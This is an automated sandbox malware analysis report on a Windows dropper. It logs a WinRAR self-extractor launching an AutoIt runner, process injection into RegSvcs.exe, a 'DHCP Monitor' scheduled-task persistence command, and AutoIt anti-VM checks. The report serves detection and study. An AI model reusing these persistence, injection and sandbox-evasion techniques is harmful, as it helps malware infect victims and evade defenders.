        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_00196D06 GetLastError,FormatMessageW,0_2_00196D06
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001A963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_001A963A
        Source: YdACOWCggQ.exeVirustotal: Detection: 35%
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeFile read: C:\Users\user\Desktop\YdACOWCggQ.exeJump to behavior
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\YdACOWCggQ.exe 'C:\Users\user\Desktop\YdACOWCggQ.exe'
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeProcess created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_00894AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,8_2_00894AEB
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifFile created: C:\Users\user\temp\qhqulleu.mp3Jump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0089E0F6 CoInitialize,CoCreateInstance,CoUninitialize,8_2_0089E0F6
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0088D606 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,8_2_0088D606
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_00863EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,FindCloseChangeNotification,8_2_00863EC5
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{c213d282-998c-4a04-8f80-944681ca75f6}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_01
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCommand line argument: sfxname0_2_001ACBB8
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCommand line argument: sfxstime0_2_001ACBB8
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCommand line argument: STARTDLG0_2_001ACBB8
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: YdACOWCggQ.exeStatic file information: File size 1073384 > 1048576
        Source: YdACOWCggQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: YdACOWCggQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: YdACOWCggQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: YdACOWCggQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: YdACOWCggQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: YdACOWCggQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: YdACOWCggQ.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YdACOWCggQ.exe
        Source: Binary string: \??\C:\Users\user~1\AppData\Local\Temp\RegSvcs.pdb.0 source: RegSvcs.exe, 0000000E.00000003.312234271.0000000001AF7000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000002.774203048.0000000000E82000.00000002.00020000.sdmp, RegSvcs.exe, 00000011.00000000.313037318.0000000000BE2000.00000002.00020000.sdmp, RegSvcs.exe.8.dr
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe.8.dr
        Source: Binary string: C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.312234271.0000000001AF7000.00000004.00000001.sdmp
        Source: YdACOWCggQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: YdACOWCggQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: YdACOWCggQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: YdACOWCggQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: YdACOWCggQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001AE336 push ecx; ret 0_2_001AE349
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001AD870 push eax; ret 0_2_001AD88E
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0085D53C push 740085CFh; iretd 8_2_0085D541
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_00846BD5 push ecx; ret 8_2_00846BE8
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_036A9EA8 push eax; ret 14_2_036A9EBE
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0083EE30 LoadLibraryA,GetProcAddress,8_2_0083EE30
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeFile created: C:\Users\user\33920049\__tmp_rar_sfx_access_check_4279718Jump to behavior
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

        Persistence and Installation Behavior:

        Drops PE files with a suspicious file extension
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeFile created: C:\Users\user\33920049\mmuiqlcvwo.pifJump to dropped file
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file

        Boot Survival:

        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'

        Hooking and other Techniques for Hiding and Protection:

        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_008AA2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_008AA2EA
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_008643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_008643FF
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        Yara detected AntiVM autoit script
        Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 4456Thread sleep count: 9866 > 30Jump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 4456Thread sleep time: -98660s >= -30000sJump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 4456Thread sleep count: 118 > 30Jump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifThread sleep count: Count: 9866 delay: -10Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifWindow / User API: threadDelayed 9866Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 2827Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 6549Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 497Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 1377Jump to behavior
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Theny8c)_
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
        Source: fmkkelc.omp.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exeZv
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe
        Source: fmkkelc.omp.0.drBinary or memory string: If ProcessExists("VMwaretray.exe") Then
        Source: fmkkelc.omp.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exeE97637D6
        Source: fmkkelc.omp.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then3P%_
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: VboxService.exe
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exe#u
        Source: RegSvcs.exe, 0000000E.00000002.778557217.0000000001B5C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: fmkkelc.omp.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001AD353 VirtualQuery,GetSystemInfo,0_2_001AD353
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_0019A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0019A2DF
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001AAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_001AAFB9
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001B9FD3 FindFirstFileExA,0_2_001B9FD3
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0086399B GetFileAttributesW,FindFirstFileW,FindClose,8_2_0086399B
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0087BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,8_2_0087BCB3
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_00882408 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_00882408
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0087280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_0087280D
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_008A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_008A8877
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0088CAE7 FindFirstFileW,FindNextFileW,FindClose,8_2_0088CAE7
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_00861A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00861A73
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0088DE7C FindFirstFileW,FindClose,8_2_0088DE7C
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0087BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0087BF17
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0083EE30 LoadLibraryA,GetProcAddress,8_2_0083EE30
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001B6AF3 mov eax, dword ptr fs:[00000030h]0_2_001B6AF3
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001AE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001AE4F5
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001BACA1 GetProcessHeap,0_2_001BACA1
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0088A35D BlockInput,8_2_0088A35D
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001AE643 SetUnhandledExceptionFilter,0_2_001AE643
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001AE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001AE7FB
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001B7BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001B7BE1
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0084F170 SetUnhandledExceptionFilter,8_2_0084F170
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0084A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0084A128
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_00847CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00847CCD

        HIPS / PFW / Operating System Protection Evasion:

        Allocates memory in foreign processes
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5A
        Writes to foreign memory regions
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11FE000
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_008643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_008643FF
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeProcess created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.ompJump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'Jump to behavior
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_00866C61 LogonUserW,8_2_00866C61
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0083D7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,8_2_0083D7A0
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_00863321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,8_2_00863321
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0087602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,8_2_0087602A
        Source: mmuiqlcvwo.pif, 00000008.00000002.778707309.00000000021A0000.00000002.00020000.sdmp, RegSvcs.exe, 0000000E.00000002.780278757.0000000002160000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then$_
        Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp, RegSvcs.exe, 0000000E.00000002.781821258.0000000003A5C000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: RegSvcs.exe, 0000000E.00000002.781821258.0000000003A5C000.00000004.00000001.sdmpBinary or memory string: Program ManagerHajlp
        Source: mmuiqlcvwo.pif.0.drBinary or memory string: IDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
        Source: mmuiqlcvwo.pif, RegSvcs.exe, 0000000E.00000002.780278757.0000000002160000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: mmuiqlcvwo.pif, 00000008.00000002.778707309.00000000021A0000.00000002.00020000.sdmp, RegSvcs.exe, 0000000E.00000002.780278757.0000000002160000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: RegSvcs.exe, 0000000E.00000002.784945197.000000000706B000.00000004.00000010.sdmpBinary or memory string: Program Managerp
        Source: RegSvcs.exe, 0000000E.00000002.781821258.0000000003A5C000.00000004.00000001.sdmpBinary or memory string: Program ManagerPZ
        Source: fmkkelc.omp.0.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
        Source: mmuiqlcvwo.pif, 00000008.00000002.778707309.00000000021A0000.00000002.00020000.sdmp, RegSvcs.exe, 0000000E.00000002.780278757.0000000002160000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: RegSvcs.exe, 0000000E.00000002.785203082.000000000796D000.00000004.00000010.sdmpBinary or memory string: Program Managerpb
        Source: mmuiqlcvwo.pif, 00000008.00000000.287969306.00000000008B2000.00000002.00020000.sdmpBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
